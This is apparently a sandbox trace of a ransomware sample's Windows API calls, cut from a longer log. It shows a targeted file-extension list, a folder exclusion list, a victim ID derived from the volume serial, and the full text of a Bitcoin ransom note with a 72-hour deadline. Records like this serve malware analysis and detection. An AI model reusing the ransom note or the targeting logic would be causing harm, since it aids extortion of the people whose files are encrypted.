s.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ini") returned 0x0
	[0180.604] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7814117a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7814117a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x781673f5, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0180.604] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.HTML", lpString2="..") returned 1
	[0180.604] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.HTML", lpString2=".") returned 1
	[0180.604] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\Public\\Documents\\" | out: lpString1="C:\\Users\\Public\\Documents\\") returned="C:\\Users\\Public\\Documents\\"
	[0180.605] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="HELP_DECRYPT_YOUR_FILES.HTML" | out: lpString1="C:\\Users\\Public\\Documents\\HELP_DECRYPT_YOUR_FILES.HTML") returned="C:\\Users\\Public\\Documents\\HELP_DECRYPT_YOUR_FILES.HTML"
	[0180.605] lstrlenW (lpString="C:\\Users\\Public\\Documents\\HELP_DECRYPT_YOUR_FILES.HTML") returned 54
	[0180.605] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.605] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Documents\\HELP_DECRYPT_YOUR_FILES.HTML", cchLength=0x36 | out: lpsz="c:\\users\\public\\documents\\help_decrypt_your_files.html") returned 0x36
	[0180.605] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.605] StrStrW (lpFirst="c:\\users\\public\\documents\\help_decrypt_your_files.html", lpSrch="help_decrypt_your_files") returned="help_decrypt_your_files.html"
	[0180.605] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7811afb2, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7811afb2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7814117a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0180.605] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.TXT", lpString2="..") returned 1
	[0180.606] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.TXT", lpString2=".") returned 1
	[0180.606] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\Public\\Documents\\" | out: lpString1="C:\\Users\\Public\\Documents\\") returned="C:\\Users\\Public\\Documents\\"
	[0180.606] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="HELP_DECRYPT_YOUR_FILES.TXT" | out: lpString1="C:\\Users\\Public\\Documents\\HELP_DECRYPT_YOUR_FILES.TXT") returned="C:\\Users\\Public\\Documents\\HELP_DECRYPT_YOUR_FILES.TXT"
	[0180.606] lstrlenW (lpString="C:\\Users\\Public\\Documents\\HELP_DECRYPT_YOUR_FILES.TXT") returned 53
	[0180.606] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.606] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Documents\\HELP_DECRYPT_YOUR_FILES.TXT", cchLength=0x35 | out: lpsz="c:\\users\\public\\documents\\help_decrypt_your_files.txt") returned 0x35
	[0180.606] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.606] StrStrW (lpFirst="c:\\users\\public\\documents\\help_decrypt_your_files.txt", lpSrch="help_decrypt_your_files") returned="help_decrypt_your_files.txt"
	[0180.606] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1
	[0180.606] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1
	[0180.607] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d5bfea2, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d5bfea2, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d5bfea2, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1
	[0180.607] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d5bfea2, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d5bfea2, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d5bfea2, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0
	[0180.607] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0180.607] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0180.608] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Public\\Documents" | out: lpString1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents"
	[0180.608] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Documents\\*.*") returned="C:\\Users\\Public\\Documents\\*.*"
	[0180.608] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.608] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.608] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Public\\Documents\\HELP_DECRYPT_YOUR_FILES.TXT") returned 53
	[0180.608] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\public\\documents\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.620] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0180.620] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0180.622] CloseHandle (hObject=0x380) returned 1
	[0180.622] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.623] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.623] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0180.624] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0180.624] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\public\\documents\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.624] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0180.625] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0180.625] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0180.625] CloseHandle (hObject=0x380) returned 1
	[0180.625] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.626] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.626] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0180.626] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Public\\Documents\\HELP_DECRYPT_YOUR_FILES.HTML") returned 54
	[0180.627] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\public\\documents\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.629] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0180.629] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0180.631] CloseHandle (hObject=0x380) returned 1
	[0180.631] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.632] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.632] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.632] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0180.633] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.633] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\public\\documents\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.634] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0180.634] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.634] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0180.634] CloseHandle (hObject=0x380) returned 1
	[0180.634] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*.*" (normalized: "c:\\users\\public\\documents\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7814117a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7814117a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0180.635] lstrlenW (lpString="C:\\Users\\Public\\Documents\\*.*") returned 29
	[0180.635] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.635] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Documents\\*.*", cchLength=0x1d | out: lpsz="c:\\users\\public\\documents\\*.*") returned 0x1d
	[0180.635] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.635] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="windows") returned 0x0
	[0180.635] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.635] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="boot") returned 0x0
	[0180.635] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.636] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="system volume information") returned 0x0
	[0180.636] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.636] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0180.636] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.636] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="temp") returned 0x0
	[0180.636] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.636] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="program files") returned 0x0
	[0180.637] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.637] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="program files (x86)") returned 0x0
	[0180.637] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.637] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="appdata") returned 0x0
	[0180.637] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.637] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="application data") returned 0x0
	[0180.637] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.637] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="winnt") returned 0x0
	[0180.638] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.638] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="tmp") returned 0x0
	[0180.638] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.638] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="cache") returned 0x0
	[0180.638] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.638] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="temporary internet files") returned 0x0
	[0180.638] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.638] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="webcache") returned 0x0
	[0180.638] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.639] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="inetcache") returned 0x0
	[0180.639] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.639] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="nvidia") returned 0x0
	[0180.639] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.639] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="packages") returned 0x0
	[0180.639] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.639] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="cookies") returned 0x0
	[0180.639] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.640] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="programdata") returned 0x0
	[0180.640] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0180.640] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0180.640] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7814117a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7814117a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0180.640] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0180.640] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x37f05f6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0180.640] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7814117a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7814117a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x85321c81, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0180.640] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7811afb2, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7811afb2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x852fba45, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0180.640] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1
	[0180.640] lstrcmpW (lpString1="My Music", lpString2="..") returned 1
	[0180.641] lstrcmpW (lpString1="My Music", lpString2=".") returned 1
	[0180.641] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\Public\\Documents" | out: lpString1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents"
	[0180.641] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\") returned="C:\\Users\\Public\\Documents\\"
	[0180.641] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="My Music" | out: lpString1="C:\\Users\\Public\\Documents\\My Music") returned="C:\\Users\\Public\\Documents\\My Music"
	[0180.648] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\Public\\Documents\\My Music" | out: lpString1="C:\\Users\\Public\\Documents\\My Music") returned="C:\\Users\\Public\\Documents\\My Music"
	[0180.648] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Music", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\My Music\\") returned="C:\\Users\\Public\\Documents\\My Music\\"
	[0180.648] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\Public\\Documents\\My Music\\" | out: lpString1="C:\\Users\\Public\\Documents\\My Music\\") returned="C:\\Users\\Public\\Documents\\My Music\\"
	[0180.649] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Music\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Documents\\My Music\\*.*") returned="C:\\Users\\Public\\Documents\\My Music\\*.*"
